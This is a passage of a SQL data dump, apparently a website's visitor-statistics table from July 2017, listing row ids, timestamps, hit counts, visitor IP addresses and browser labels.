0825,1,1,0,0,'216.244.66.194','other'),(128491,1498971034,1,1,0,0,'46.188.106.212','msie'),(128492,1498971117,1,0,1,0,'66.249.65.81',''),(128493,1498971186,1,1,0,0,'164.132.161.62','other'),(128494,1498971206,1,0,1,0,'68.180.230.48',''),(128495,1498971244,1,1,0,0,'217.182.132.174','other'),(128496,1498971587,1,1,0,0,'164.132.161.55','other'),(128497,1498971897,1,1,0,0,'217.182.132.154','other'),(128498,1498972289,1,1,0,0,'94.180.155.181','msie'),(128499,1498972290,1,0,1,0,'68.180.230.48',''),(128500,1498972484,1,0,1,0,'66.249.66.156',''),(128501,1498972723,1,1,0,0,'217.182.132.55','other'),(128502,1498972725,1,1,0,0,'37.204.66.49','msie'),(128503,1498972896,1,0,1,0,'66.249.76.91',''),(128504,1498972941,1,0,1,0,'66.249.66.75',''),(128505,1498973115,1,1,0,0,'164.132.161.48','other'),(128506,1498973276,1,0,1,0,'66.249.76.109',''),(128507,1498973338,1,1,0,0,'40.77.167.23','other'),(128508,1498973510,1,1,0,0,'51.255.65.34','other'),(128509,1498973865,1,1,0,0,'164.132.161.57','other'),(128510,1498973958,1,1,0,0,'95.220.21.154','msie'),(128511,1498974600,1,1,0,0,'95.220.193.109','msie'),(128512,1498974762,1,1,0,0,'95.108.213.34','other'),(128513,1498974844,1,1,0,0,'62.210.101.104','other'),(128514,1498975149,1,1,0,0,'51.255.65.21','other'),(128515,1498975232,1,1,0,0,'164.132.161.8','other'),(128516,1498975491,1,1,0,0,'5.255.253.58','other'),(128517,1498975836,1,1,0,0,'217.182.132.23','other'),(128518,1498976450,1,1,0,0,'137.74.207.120','other'),(128519,1498976645,1,1,0,0,'51.255.65.36','other'),(128520,1498976731,1,0,1,0,'66.249.76.93',''),(128521,1498976747,6,6,0,0,'216.244.66.194','other'),(128522,1498977710,1,1,0,0,'217.182.132.29','other'),(128523,1498977816,1,0,1,0,'68.180.230.48',''),(128524,1498977910,1,1,0,0,'51.255.71.129','other'),(128525,1498977958,1,1,0,0,'51.255.71.118','other'),(128526,1498977971,1,1,0,0,'217.182.132.149','other'),(128527,1498978139,1,1,0,0,'164.132.161.63','other'),(128528,1498978234,1,1,0,0,'217.182.132.90','other'),(128529,1498978929,1,0,1,0,'68.180.230.48',''),(128530,1498979078,1,1,0,0,'51.255.65.95','other'),(128531,1498979156,1,1,0,0,'8.29.198.27','other'),(128532,1498979159,1,1,0,0,'188.32.176.228','msie'),(128533,1498979162,1,1,0,0,'164.132.161.72','other'),(128534,1498979397,1,1,0,0,'217.182.132.86','other'),(128535,1498979608,1,1,0,0,'51.255.71.127','other'),(128536,1498979750,1,1,0,0,'51.255.65.5','other'),(128537,1498979771,4,4,0,0,'149.140.65.17','other'),(128538,1498980029,1,1,0,0,'37.204.66.49','msie'),(128539,1498980171,1,1,0,0,'54.165.59.7','other'),(128540,1498980501,1,1,0,0,'51.255.65.94','other'),(128541,1498980603,1,1,0,0,'164.132.161.83','other'),(128542,1498980654,1,1,0,0,'217.182.132.17','other'),(128543,1498980903,1,1,0,0,'217.69.133.4','other'),(128544,1498980926,2,2,0,0,'91.209.11.236','other'),(128545,1498980982,1,1,0,0,'51.255.71.111','other'),(128546,1498981020,116,116,0,0,'88.198.23.179','other'),(128547,1498981047,1,1,0,0,'217.182.132.178','other'),(128548,1498981158,1,1,0,0,'217.182.132.93','other'),(128549,1498981319,1,1,0,0,'217.182.132.172','other'),(128550,1498981389,3,3,0,0,'216.244.66.246','other'),(128551,1498981497,1,1,0,0,'51.255.65.84','other'),(128552,1498981589,1,1,0,0,'141.8.132.25','other'),(128553,1498981593,1,1,0,0,'5.255.253.28','other'),(128554,1498981900,2,0,2,0,'68.180.230.48',''),(128555,1498982181,1,1,0,0,'216.244.66.237','other'),(128556,1498983045,1,1,0,0,'164.132.162.156','other'),(128557,1498983127,1,1,0,0,'217.182.132.27','other'),(128558,1498983188,4,4,0,0,'216.244.66.194','other'),(128559,1498983477,1,0,1,0,'68.180.230.48',''),(128560,1498983595,1,0,1,0,'66.249.76.89',''),(128561,1498983623,1,1,0,0,'51.255.65.74','other'),(128562,1498984028,4,4,0,0,'216.244.66.246','other'),(128563,1498984742,1,1,0,0,'180.76.15.139','other'),(128564,1498984923,1,1,0,0,'51.255.65.79','other'),(128565,1498985085,1,1,0,0,'217.182.132.33','other'),(128566,1498985208,1,1,0,0,'216.244.66.237','other'),(128567,1498985559,1,0,1,0,'68.180.230.48',''),(128568,1498985957,1,1,0,0,'217.182.132.179','other'),(128569,1498986560,1,1,0,0,'51.255.65.56','other'),(128570,1498986561,1,1,0,0,'51.255.65.39','other'),(128571,1498986875,1,0,1,0,'68.180.230.48',''),(128572,1498987166,1,1,0,0,'51.255.65.61','other'),(128573,1498987698,1,1,0,0,'217.182.132.18','other'),(128574,1498987797,1,1,0,0,'51.255.71.113','other'),(128575,1498988346,1,1,0,0,'216.244.66.194','other'),(128576,1498988357,1,0,1,0,'68.180.230.48',''),(128577,1498988703,1,1,0,0,'217.182.132.84','other'),(128578,1498988746,1,1,0,0,'164.132.161.33','other'),(128579,1498989673,1,1,0,0,'217.182.132.68','other'),(128580,1498989974,1,1,0,0,'51.255.65.51','other'),(128581,1498989986,1,1,0,0,'8.29.198.27','other'),(128582,1498990443,1,1,0,0,'164.132.161.85','other'),(128583,1498990616,1,1,0,0,'164.132.161.52','other'),(128584,1498990829,1,1,0,0,'164.132.161.87','other'),(128585,1498990917,1,1,0,0,'162.210.196.130','other'),(128586,1498991424,1,1,0,0,'217.182.132.84','other'),(128587,1498991440,1,1,0,0,'51.255.65.61','other'),(128588,1498991821,1,1,0,0,'217.69.133.203','other'),(128589,1498991842,1,1,0,0,'217.182.132.176','other'),(128590,1498992148,1,1,0,0,'51.255.65.67','other'),(128591,1498992164,1,1,0,0,'217.182.132.171','other'),(128592,1498992887,1,1,0,0,'51.255.71.98','other'),(128593,1498992961,1,1,0,0,'216.244.66.246','other'),(128594,1498993055,1,1,0,0,'217.182.132.83','other'),(128595,1498993612,7,7,0,0,'216.244.66.194','other'),(128596,1498993640,1,0,1,0,'66.249.76.108',''),(128597,1498993700,1,1,0,0,'51.255.65.12','other'),(128598,1498994146,1,0,1,0,'68.180.230.48',''),(128599,1498994160,3,3,0,0,'149.140.65.17','other'),(128600,1498994278,1,1,0,0,'216.244.66.237','other'),(128601,1498994295,1,1,0,0,'217.182.132.170','other'),(128602,1498994362,1,1,0,0,'217.182.132.241','other'),(128603,1498994481,1,0,1,0,'66.249.76.89',''),(128604,1498994669,1,1,0,0,'141.8.142.38','other'),(128605,1498995130,4,4,0,0,'216.244.66.246','other'),(128606,1498995457,1,1,0,0,'51.255.71.131','other'),(128607,1498995734,1,1,0,0,'164.132.161.86','other'),(128608,1498997070,1,1,0,0,'51.255.65.14','other'),(128609,1498997104,1,1,0,0,'164.132.161.13','other'),(128610,1498997136,1,1,0,0,'51.255.65.3','other'),(128611,1498997989,1,1,0,0,'216.244.66.194','other'),(128612,1498997990,2,2,0,0,'66.249.76.108','chrome'),(128613,1498998218,1,1,0,0,'180.76.15.5','other'),(128614,1498998549,1,1,0,0,'217.182.132.187','other'),(128615,1498998682,1,1,0,0,'40.77.167.94','other'),(128616,1498998891,1,1,0,0,'217.182.132.175','other'),(128617,1498999773,1,1,0,0,'217.182.132.82','other'),(128618,1498999993,1,1,0,0,'164.132.161.57','other'),(128619,1499000499,1,1,0,0,'217.182.132.15','other'),(128620,1499000551,1,1,0,0,'216.244.66.246','other'),(128621,1499000677,1,1,0,0,'51.255.71.114','other'),(128622,1499000815,1,1,0,0,'8.29.198.26','other'),(128623,1499001207,1,1,0,0,'40.77.167.23','other'),(128624,1499001414,1,1,0,0,'51.255.65.52','other'),(128625,1499001549,1,1,0,0,'217.182.132.185','other'),(128626,1499001768,1,1,0,0,'164.132.161.31','other'),(128627,1499001780,4,4,0,0,'216.244.66.246','other'),(128628,1499001820,1,1,0,0,'66.249.76.109','chrome'),(128629,1499001836,1,1,0,0,'164.132.161.90','other'),(128630,1499002071,1,1,0,0,'66.102.9.29','chrome'),(128631,1499002154,2,1,1,0,'66.249.76.89',''),(128632,1499002201,1,1,0,0,'217.182.132.15','other'),(128633,1499002241,1,1,0,0,'216.244.66.194','other'),(128634,1499002348,1,1,0,0,'66.249.76.93','chrome'),(128635,1499002593,1,1,0,0,'164.132.161.6','other'),(128636,1499003266,1,1,0,0,'164.132.161.79','other'),(128637,1499003967,1,1,0,0,'164.132.161.88','other'),(128638,1499004532,1,1,0,0,'137.74.207.110','other'),(128639,1499004642,1,1,0,0,'40.77.167.23','other'),(128640,1499004861,1,1,0,0,'217.182.132.66','other'),(128641,1499005040,1,1,0,0,'137.74.207.102','other'),(128642,1499005056,1,0,1,0,'66.249.76.91',''),(128643,1499005079,1,1,0,0,'217.182.132.177','other'),(128644,1499005101,1,1,0,0,'217.182.132.186','other'),(128645,1499005329,1,1,0,0,'217.182.132.84','other'),(128646,1499005674,1,1,0,0,'51.255.65.27','other'),(128647,1499005773,1,1,0,0,'66.249.66.157','chrome'),(128648,1499005957,1,1,0,0,'217.182.132.27','other'),(128649,1499005970,1,1,0,0,'164.132.161.26','other'),(128650,1499005988,1,1,0,0,'217.182.132.76','other'),(128651,1499006107,1,1,0,0,'51.255.71.130','other'),(128652,1499006700,1,1,0,0,'51.255.65.87','other'),(128653,1499006748,1,1,0,0,'217.182.132.58','other'),(128654,1499006902,1,1,0,0,'164.132.161.84','other'),(128655,1499007761,2,2,0,0,'216.244.66.194','other'),(128656,1499008124,1,1,0,0,'51.255.71.129','other'),(128657,1499008184,1,1,0,0,'164.132.162.160','other'),(128658,1499008227,1,0,1,0,'66.249.76.107',''),(128659,1499008904,1,1,0,0,'137.74.207.159','other'),(128660,1499009325,1,1,0,0,'164.132.161.58','other'),(128661,1499009486,1,1,0,0,'51.255.65.68','other'),(128662,1499009496,1,1,0,0,'51.255.65.35','other'),(128663,1499009743,1,1,0,0,'217.182.132.84','other'),(128664,1499009802,1,1,0,0,'109.63.212.6','msie'),(128665,1499009819,1,1,0,0,'95.220.21.154','msie'),(128666,1499009848,1,1,0,0,'180.76.15.155','other'),(128667,1499010275,4,4,0,0,'216.244.66.246','other'),(128668,1499010334,1,1,0,0,'217.182.132.78','other'),(128669,1499010482,1,1,0,0,'51.255.65.2','other'),(128670,1499010529,1,1,0,0,'164.132.161.80','other'),(128671,1499010565,1,1,0,0,'66.249.76.107','chrome'),(128672,1499011019,1,1,0,0,'164.132.161.20','other'),(128673,1499011066,1,1,0,0,'93.158.152.77','other'),(128674,1499011100,1,1,0,0,'93.158.152.59','other'),(128675,1499011557,4,4,0,0,'216.244.66.246','other'),(128676,1499011642,1,1,0,0,'8.29.198.27','other'),(128677,1499012039,1,1,0,0,'217.182.132.77','other'),(128678,1499012170,1,1,0,0,'51.255.65.16','other'),(128679,1499012519,1,1,0,0,'51.255.65.60','other'),(128680,1499012715,1,0,1,0,'66.249.76.107',''),(128681,1499013684,1,1,0,0,'66.249.66.75','chrome'),(128682,1499013868,1,0,1,0,'66.249.76.89',''),(128683,1499013953,1,1,0,0,'164.132.164.180','other'),(128684,1499014236,3,3,0,0,'216.244.66.194','other'),(128685,1499014440,1,1,0,0,'40.77.167.94','other'),(128686,1499014679,17,17,0,0,'208.43.225.84','other'),(128687,1499014778,7,7,0,0,'208.43.225.85','other'),(128688,1499015363,1,1,0,0,'66.249.76.109','chrome'),(128689,1499015445,1,1,0,0,'217.182.132.186','other'),(128690,1499015631,1,1,0,0,'66.249.76.108','chrome'),(128691,1499015748,1,0,1,0,'66.249.66.156',''),(128692,1499016390,1,1,0,0,'51.255.65.88','other'),(128693,1499016672,1,1,0,0,'93.158.152.77','other'),(128694,1499016857,1,1,0,0,'66.249.76.107','chrome'),(128695,1499016896,1,1,0,0,'95.108.213.8','other'),(128696,1499017219,1,1,0,0,'164.132.161.28','other'),(128697,1499017918,5,5,0,0,'192.187.123.162','other'),(128698,1499018162,1,1,0,0,'217.182.132.155','other'),(128699,1499018408,1,1,0,0,'176.8.231.28','chrome'),(128700,1499018460,1,0,1,0,'66.249.76.91',''),(128701,1499018664,1,1,0,0,'188.244.46.205','msie'),(128702,1499019070,1,1,0,0,'217.182.132.90','other'),(128703,1499019263,1,1,0,0,'217.182.132.80','other'),(128704,1499019291,1,1,0,0,'51.255.65.53','other'),(128705,1499019509,1,1,0,0,'164.132.161.34','other'),(128706,1499019867,1,1,0,0,'66.249.76.107','chrome'),(128707,1499020876,1,1,0,0,'178.92.249.222','chrome'),(128708,1499021212,1,1,0,0,'217.182.132.63','other'),(128709,1499021329,3,3,0,0,'216.244.66.194','other'),(128710,1499021425,1,1,0,0,'164.132.161.68','other'),(128711,1499021558,1,1,0,0,'216.244.66.246','other'),(128712,1499021690,1,1,0,0,'164.132.161.56','other'),(128713,1499021729,1,1,0,0,'217.182.132.95','other'),(128714,1499021775,1,1,0,0,'51.255.71.110','other'),(128715,1499022142,1,1,0,0,'51.255.65.25','other'),(128716,1499022475,1,1,0,0,'8.29.198.27','other'),(128717,1499022788,1,1,0,0,'164.132.161.18','other'),(128718,1499023167,1,1,0,0,'207.46.13.140','other'),(128719,1499023462,1,1,0,0,'217.182.132.53','other'),(128720,1499023864,1,1,0,0,'217.182.132.91','other'),(128721,1499024892,1,1,0,0,'51.255.65.50','other'),(128722,1499024943,1,0,1,0,'66.249.76.91',''),(128723,1499025096,1,1,0,0,'51.255.65.72','other'),(128724,1499025122,1,1,0,0,'87.250.224.16','other'),(128725,1499025200,1,1,0,0,'51.255.65.48','other'),(128726,1499025582,1,1,0,0,'164.132.161.65','other'),(128727,1499025845,1,1,0,0,'164.132.161.41','other'),(128728,1499026017,1,1,0,0,'164.132.161.15','other'),(128729,1499026158,1,1,0,0,'217.182.132.84','other'),(128730,1499026847,1,1,0,0,'137.74.207.170','other'),(128731,1499027056,1,1,0,0,'178.154.200.45','other'),(128732,1499027166,1,1,0,0,'66.249.66.156','chrome'),(128733,1499027901,1,1,0,0,'51.255.65.83','other'),(128734,1499028138,5,5,0,0,'216.244.66.194','other'),(128735,1499028593,1,1,0,0,'51.255.65.23','other'),(128736,1499028854,2,2,0,0,'216.244.66.246','other'),(128737,1499029123,1,1,0,0,'137.74.207.120','other'),(128738,1499029127,1,1,0,0,'51.255.65.83','other'),(128739,1499029189,1,1,0,0,'188.32.185.75','msie'),(128740,1499029722,1,1,0,0,'66.249.76.108','chrome'),(128741,1499030519,1,0,1,0,'66.249.76.91',''),(128742,1499030562,1,1,0,0,'51.255.65.3','other'),(128743,1499031471,1,1,0,0,'66.249.66.155','chrome'),(128744,1499031607,1,1,0,0,'217.182.132.16','other'),(128745,1499031614,1,1,0,0,'188.244.46.205','msie'),(128746,1499031829,1,1,0,0,'216.244.66.246','other'),(128747,1499032113,1,1,0,0,'217.182.132.21','other'),(128748,1499032149,1,1,0,0,'51.255.65.14','other'),(128749,1499032507,1,1,0,0,'51.255.65.17','other'),(128750,1499033150,1,0,1,0,'68.180.230.48',''),(128751,1499033309,1,1,0,0,'8.29.198.25','other'),(128752,1499033383,1,1,0,0,'217.182.132.186','other'),(128753,1499034031,1,1,0,0,'51.255.71.128','other'),(128754,1499034409,1,1,0,0,'176.31.231.10','other'),(128755,1499034598,1,1,0,0,'66.249.76.89','chrome'),(128756,1499034617,1,1,0,0,'164.132.161.93','other'),(128757,1499034640,1,0,1,0,'66.249.76.93',''),(128758,1499034662,1,1,0,0,'51.255.71.116','other'),(128759,1499034953,1,1,0,0,'5.165.242.134','msie'),(128760,1499035072,1,1,0,0,'180.76.15.140','other'),(128761,1499035202,1,0,1,0,'66.249.76.108',''),(128762,1499035483,1,1,0,0,'51.255.65.70','other'),(128763,1499035534,1,1,0,0,'46.161.9.55','firefox'),(128764,1499035863,1,1,0,0,'46.242.91.219','msie'),(128765,1499035881,2,2,0,0,'216.244.66.246','other'),(128766,1499035906,1,1,0,0,'5.228.112.217','msie'),(128767,1499035987,1,1,0,0,'95.220.22.41','msie'),(128768,1499036969,1,1,0,0,'164.132.161.73','other'),(128769,1499037594,1,0,1,0,'66.249.66.76',''),(128770,1499037595,1,1,0,0,'164.132.161.4','other'),(128771,1499037605,1,1,0,0,'51.255.65.46','other'),(128772,1499038053,1,1,0,0,'164.132.161.25','other'),(128773,1499038171,1,0,1,0,'66.249.76.109',''),(128774,1499038673,1,1,0,0,'51.255.65.46','other'),(128775,1499039126,1,1,0,0,'164.132.161.74','other'),(128776,1499039163,1,1,0,0,'51.255.65.30','other'),(128777,1499039389,1,1,0,0,'164.132.161.23','other'),(128778,1499039781,1,1,0,0,'66.249.66.156','chrome'),(128779,1499039858,1,1,0,0,'164.132.161.96','other'),(128780,1499039989,1,1,0,0,'217.182.132.31','other'),(128781,1499040092,1,1,0,0,'66.249.76.109','chrome'),(128782,1499040140,1,1,0,0,'66.249.66.74','chrome'),(128783,1499040141,1,1,0,0,'217.69.133.9','other'),(128784,1499040260,1,1,0,0,'164.132.161.90','other'),(128785,1499040264,1,1,0,0,'66.249.76.108','chrome'),(128786,1499040327,1,1,0,0,'66.249.76.89','chrome'),(128787,1499040372,1,1,0,0,'51.255.65.47','other'),(128788,1499040784,2,2,0,0,'95.213.141.126','opera'),(128789,1499041216,1,1,0,0,'216.244.66.246','other'),(128790,1499041238,1,1,0,0,'51.255.65.49','other'),(128791,1499041258,1,1,0,0,'217.182.132.69','other'),(128792,1499041451,1,1,0,0,'217.182.132.5','other'),(128793,1499041490,1,1,0,0,'178.140.154.128','msie'),(128794,1499042201,1,1,0,0,'137.74.207.108','other'),(128795,1499042993,1,1,0,0,'164.132.161.63','other'),(128796,1499043107,1,1,0,0,'66.249.76.91','chrome'),(128797,1499043573,1,1,0,0,'51.255.65.45','other'),(128798,1499043717,1,1,0,0,'51.255.65.8','other'),(128799,1499044132,1,1,0,0,'8.29.198.27','other'),(128800,1499044270,2,2,0,0,'216.244.66.246','other'),(128801,1499044304,1,1,0,0,'51.255.71.125','other'),(128802,1499044355,1,1,0,0,'51.255.65.58','other'),(128803,1499044825,1,1,0,0,'51.255.65.22','other'),(128804,1499044898,1,1,0,0,'51.255.65.32','other'),(128805,1499044924,1,1,0,0,'51.255.65.49','other'),(128806,1499046571,1,1,0,0,'137.74.207.164','other'),(128807,1499046657,1,1,0,0,'164.132.161.55','other'),(128808,1499047229,1,1,0,0,'188.244.46.205','msie'),(128809,1499047402,1,0,1,0,'66.249.76.109',''),(128810,1499047713,1,1,0,0,'164.132.161.37','other'),(128811,1499047797,1,1,0,0,'180.76.15.162','other'),(128812,1499048205,1,1,0,0,'164.132.161.64','other'),(128813,1499048758,1,1,0,0,'217.182.132.157','other'),(128814,1499048768,1,1,0,0,'164.132.161.10','other'),(128815,1499048784,1,1,0,0,'46.188.106.212','msie'),(128816,1499049013,1,1,0,0,'217.182.132.175','other'),(128817,1499049905,1,1,0,0,'51.255.65.59','other'),(128818,1499050086,4,4,0,0,'216.244.66.246','other'),(128819,1499050335,1,1,0,0,'185.26.180.89','other'),(128820,1499050578,1,1,0,0,'188.32.176.228','msie'),(128821,1499050743,1,1,0,0,'51.255.65.95','other'),(128822,1499051212,1,1,0,0,'5.228.100.210','msie'),(128823,1499051406,3,3,0,0,'216.244.66.194','other'),(128824,1499051562,1,1,0,0,'46.161.9.55','firefox'),(128825,1499051851,1,1,0,0,'164.132.161.88','other'),(128826,1499051888,1,0,1,0,'68.180.230.48',''),(128827,1499051991,1,1,0,0,'46.161.9.55','chrome'),(128828,1499052039,1,1,0,0,'217.182.132.65','other'),(128829,1499052315,1,1,0,0,'95.220.44.12','msie'),(128830,1499052537,1,1,0,0,'5.255.253.63','other'),(128831,1499052779,1,1,0,0,'51.255.65.95','other'),(128832,1499053186,1,1,0,0,'87.250.224.16','other'),(128833,1499053302,1,1,0,0,'217.182.132.174','other'),(128834,1499053315,1,1,0,0,'164.132.161.57','other'),(128835,1499053402,1,1,0,0,'51.255.65.24','other'),(128836,1499053917,1,1,0,0,'51.255.65.82','other'),(128837,1499054719,1,1,0,0,'51.255.65.19','other'),(128838,1499054724,1,1,0,0,'217.182.132.188','other'),(128839,1499054879,1,1,0,0,'164.132.161.36','other'),(128840,1499054955,1,1,0,0,'8.29.198.25','other'),(128841,1499055389,1,1,0,0,'51.255.65.96','other'),(128842,1499055546,1,1,0,0,'51.255.65.63','other'),(128843,1499055695,1,1,0,0,'164.132.162.188','other'),(128844,1499055957,1,1,0,0,'217.182.132.177','other'),(128845,1499056102,1,1,0,0,'217.182.132.187','other'),(128846,1499056131,2,2,0,0,'216.244.66.194','other'),(128847,1499056177,1,0,1,0,'68.180.230.48',''),(128848,1499056198,2,2,0,0,'216.244.66.246','other'),(128849,1499057107,1,1,0,0,'91.196.178.67','firefox'),(128850,1499057151,1,1,0,0,'217.182.132.21','other'),(128851,1499057386,1,1,0,0,'164.132.161.34','other'),(128852,1499058436,1,1,0,0,'91.196.178.67','firefox'),(128853,1499059358,1,0,1,0,'66.249.76.108',''),(128854,1499059587,1,1,0,0,'51.255.65.50','other'),(128855,1499060021,1,1,0,0,'164.132.161.45','other'),(128856,1499060213,1,1,0,0,'164.132.161.77','other'),(128857,1499060334,1,1,0,0,'217.182.132.65','other'),(128858,1499060394,3,3,0,0,'216.244.66.194','other'),(128859,1499060601,1,0,1,0,'66.249.76.91',''),(128860,1499060656,1,1,0,0,'51.255.71.131','other'),(128861,1499060788,1,1,0,0,'31.3.238.154','firefox'),(128862,1499060931,1,1,0,0,'217.182.132.7','other'),(128863,1499061130,1,1,0,0,'51.255.65.90','other'),(128864,1499061135,2,2,0,0,'216.244.66.246','other'),(128865,1499061344,1,1,0,0,'51.255.71.116','other'),(128866,1499061615,1,1,0,0,'109.63.190.217','msie'),(128867,1499061683,1,1,0,0,'164.132.161.63','other'),(128868,1499061872,1,1,0,0,'37.54.69.135','chrome'),(128869,1499061920,1,1,0,0,'164.132.161.40','other'),(128870,1499062165,1,1,0,0,'164.132.161.68','other'),(128871,1499062280,1,1,0,0,'51.255.71.122','other'),(128872,1499062289,1,1,0,0,'164.132.162.155','other'),(128873,1499062376,1,1,0,0,'178.154.149.1','other'),(128874,1499063204,1,1,0,0,'31.43.60.229','firefox'),(128875,1499063217,1,1,0,0,'51.255.65.21','other'),(128876,1499063545,1,1,0,0,'164.132.161.83','other'),(128877,1499063959,1,1,0,0,'217.182.132.175','other'),(128878,1499064170,1,1,0,0,'93.74.18.117','other'),(128879,1499064438,1,1,0,0,'180.76.15.149','other'),(128880,1499064941,1,1,0,0,'137.74.207.116','other'),(128881,1499065219,1,1,0,0,'164.132.161.76','other'),(128882,1499065650,1,1,0,0,'51.255.65.81','other'),(128883,1499065780,1,1,0,0,'8.29.198.27','other'),(128884,1499065804,1,1,0,0,'216.244.66.237','other'),(128885,1499065901,1,1,0,0,'51.255.65.36','other'),(128886,1499065909,1,0,1,0,'68.180.230.48',''),(128887,1499065959,1,1,0,0,'51.255.65.56','other'),(128888,1499066098,2,2,0,0,'216.244.66.246','other'),(128889,1499066891,1,1,0,0,'95.132.52.250','firefox'),(128890,1499067116,1,1,0,0,'91.196.178.65','firefox'),(128891,1499067316,1,1,0,0,'51.255.65.33','other'),(128892,1499067607,1,1,0,0,'51.255.71.111','other'),(128893,1499067811,1,1,0,0,'51.255.65.8','other'),(128894,1499067869,1,1,0,0,'217.182.132.147','other'),(128895,1499068382,2,2,0,0,'216.244.66.246','other'),(128896,1499068582,1,1,0,0,'95.132.52.250','firefox'),(128897,1499068647,1,1,0,0,'91.196.178.161','chrome'),(128898,1499068674,1,1,0,0,'164.132.161.40','other'),(128899,1499068987,1,1,0,0,'109.63.215.18','msie'),(128900,1499069074,1,1,0,0,'164.132.161.62','other'),(128901,1499069651,1,1,0,0,'144.76.38.73','other'),(128902,1499070165,1,1,0,0,'51.255.65.11','other'),(128903,1499070303,1,1,0,0,'51.255.65.35','other'),(128904,1499070431,1,1,0,0,'91.124.45.211','firefox'),(128905,1499070996,1,1,0,0,'216.244.66.194','other'),(128906,1499071139,1,1,0,0,'51.255.65.79','other'),(128907,1499071431,1,1,0,0,'91.196.178.129','firefox'),(128908,1499071630,1,1,0,0,'51.255.65.31','other'),(128909,1499071758,1,1,0,0,'92.113.85.73','chrome'),(128910,1499072016,1,1,0,0,'51.255.64.106','other'),(128911,1499072114,1,1,0,0,'217.182.132.96','other'),(128912,1499072269,1,1,0,0,'51.255.65.3','other'),(128913,1499072272,1,1,0,0,'164.132.161.5','other'),(128914,1499072273,1,1,0,0,'51.255.65.9','other'),(128915,1499072773,1,1,0,0,'51.255.65.21','other'),(128916,1499072900,1,1,0,0,'164.132.161.37','other'),(128917,1499073069,1,1,0,0,'91.196.178.65','firefox'),(128918,1499073119,1,1,0,0,'91.196.178.166','other'),(128919,1499073142,1,1,0,0,'137.74.207.102','other'),(128920,1499073244,1,1,0,0,'164.132.161.68','other'),(128921,1499073266,1,1,0,0,'164.132.164.180','other'),(128922,1499073446,1,1,0,0,'51.255.65.2','other'),(128923,1499073601,1,1,0,0,'37.115.78.187','chrome'),(128924,1499073623,1,0,1,0,'68.180.230.48',''),(128925,1499073839,1,1,0,0,'31.43.19.98','chrome'),(128926,1499074162,1,1,0,0,'216.244.66.237','other'),(128927,1499074217,1,1,0,0,'217.182.132.176','other'),(128928,1499075051,1,1,0,0,'164.132.161.43','other'),(128929,1499075119,1,0,1,0,'68.180.230.48',''),(128930,1499075560,1,1,0,0,'51.255.65.15','other'),(128931,1499075903,1,1,0,0,'91.196.177.46','chrome'),(128932,1499076042,1,1,0,0,'217.182.132.148','other'),(128933,1499076183,1,1,0,0,'217.182.132.28','other'),(128934,1499076402,1,1,0,0,'51.255.65.60','other'),(128935,1499076608,1,1,0,0,'8.29.198.25','other'),(128936,1499076623,4,4,0,0,'216.244.66.194','other'),(128937,1499076841,1,0,1,0,'66.249.76.93',''),(128938,1499076890,1,1,0,0,'51.255.65.42','other'),(128939,1499076892,1,1,0,0,'164.132.162.157','other'),(128940,1499076901,1,1,0,0,'162.210.196.100','other'),(128941,1499076976,1,1,0,0,'91.209.11.236','other'),(128942,1499077121,1,1,0,0,'194.44.233.65','chrome'),(128943,1499077374,2,2,0,0,'216.244.66.246','other'),(128944,1499077541,1,1,0,0,'51.255.65.56','other'),(128945,1499077822,1,1,0,0,'51.255.71.115','other'),(128946,1499077985,1,1,0,0,'66.249.76.109','chrome'),(128947,1499078150,1,1,0,0,'93.158.152.42','other'),(128948,1499078177,1,1,0,0,'37.54.69.135','chrome'),(128949,1499078338,1,1,0,0,'95.108.179.21','other'),(128950,1499078579,1,1,0,0,'130.180.212.1','chrome'),(128951,1499078850,1,1,0,0,'66.249.66.76','chrome'),(128952,1499079340,1,1,0,0,'216.244.66.237','other'),(128953,1499079428,1,1,0,0,'217.182.132.32','other'),(128954,1499079508,1,1,0,0,'91.196.178.161','chrome'),(128955,1499079557,1,1,0,0,'151.80.27.118','other'),(128956,1499079735,1,1,0,0,'51.255.65.71','other'),(128957,1499080139,1,1,0,0,'92.112.227.126','chrome'),(128958,1499080877,1,1,0,0,'217.182.132.175','other'),(128959,1499081196,1,1,0,0,'217.182.132.64','other'),(128960,1499081423,1,1,0,0,'95.108.179.21','other'),(128961,1499081699,1,1,0,0,'216.244.66.194','other'),(128962,1499081963,1,1,0,0,'217.182.132.70','other'),(128963,1499082116,1,1,0,0,'217.182.132.19','other'),(128964,1499082117,1,1,0,0,'51.255.65.97','other'),(128965,1499082490,1,1,0,0,'46.201.234.169','chrome'),(128966,1499082502,1,1,0,0,'46.201.55.54','chrome'),(128967,1499082587,1,1,0,0,'37.54.69.135','chrome'),(128968,1499082750,1,0,1,0,'66.249.66.155',''),(128969,1499083051,1,1,0,0,'217.182.132.77','other'),(128970,1499083123,1,1,0,0,'5.255.253.83','other'),(128971,1499083194,1,1,0,0,'91.209.11.236','other'),(128972,1499083380,1,1,0,0,'51.255.64.106','other'),(128973,1499083395,1,1,0,0,'91.196.178.70','firefox'),(128974,1499083489,1,1,0,0,'92.113.191.93','chrome'),(128975,1499084002,1,1,0,0,'51.255.65.53','other'),(128976,1499084135,1,1,0,0,'216.244.66.246','other'),(128977,1499084201,1,1,0,0,'157.55.39.131','other'),(128978,1499084343,1,1,0,0,'137.74.207.161','other'),(128979,1499084421,1,1,0,0,'51.255.65.57','other'),(128980,1499084547,1,1,0,0,'188.244.46.205','msie'),(128981,1499084693,1,1,0,0,'137.74.207.114','other'),(128982,1499084718,1,1,0,0,'216.144.236.43','chrome'),(128983,1499085105,1,1,0,0,'95.108.213.34','other'),(128984,1499085328,1,1,0,0,'91.196.178.69','chrome'),(128985,1499085403,1,1,0,0,'217.182.132.97','other'),(128986,1499085613,1,1,0,0,'217.182.132.94','other'),(128987,1499085643,1,1,0,0,'51.255.71.114','other'),(128988,1499086163,1,1,0,0,'91.209.11.236','other'),(128989,1499086208,1,1,0,0,'217.182.132.187','other'),(128990,1499086211,1,1,0,0,'66.249.76.93','chrome'),(128991,1499086222,1,1,0,0,'217.182.132.65','other'),(128992,1499086420,1,1,0,0,'178.94.40.166','chrome'),(128993,1499086498,1,1,0,0,'37.54.195.2','chrome'),(128994,1499086826,1,0,1,0,'66.249.66.156',''),(128995,1499086838,1,1,0,0,'66.249.76.107','chrome'),(128996,1499087200,1,1,0,0,'216.244.66.246','other'),(128997,1499087267,1,1,0,0,'217.182.132.20','other'),(128998,1499087438,1,1,0,0,'8.29.198.25','other'),(128999,1499087700,1,1,0,0,'51.255.65.72','other'),(129000,1499087731,1,1,0,0,'51.255.65.24','other'),(129001,1499087864,1,1,0,0,'217.182.132.91','other'),(129002,1499088484,1,1,0,0,'217.182.132.6','other'),(129003,1499088795,1,1,0,0,'95.108.213.34','o